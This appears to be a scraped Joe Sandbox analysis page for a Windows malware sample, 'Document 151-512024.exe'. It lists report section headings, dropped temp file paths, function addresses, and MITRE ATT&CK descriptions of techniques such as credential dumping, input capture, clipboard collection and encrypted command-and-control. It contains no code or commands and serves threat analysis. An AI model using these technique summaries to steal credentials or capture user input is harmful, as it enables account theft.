Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Document 151-512024.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\F56GKLK7U4

C:\Users\user\AppData\Local\Temp\autB569.tmp

C:\Users\user\AppData\Local\Temp\autB5B8.tmp

C:\Users\user\AppData\Local\Temp\colliquefaction

C:\Users\user\AppData\Local\Temp\gobioid

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Windows Analysis Report
Document 151-512024.exe

Function 009442DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235
libraryloaderCOMMON

Function 009442A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Function 00982BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62
COMMON

Function 00942CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Function 0098065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Function 0094344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Function 00942B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Function 00943170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145
windowtimeregistryCOMMON

Function 00978D45 Relevance: 13.8, APIs: 9, Instructions: 300
COMMONLIBRARYCODE

Function 01BC2640 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Function 00942C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Function 01BC2410 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 143
fileCOMMON

Function 009B2947 Relevance: 7.8, APIs: 5, Instructions: 313
fileCOMMON

Function 00943B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58
registryCOMMON

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre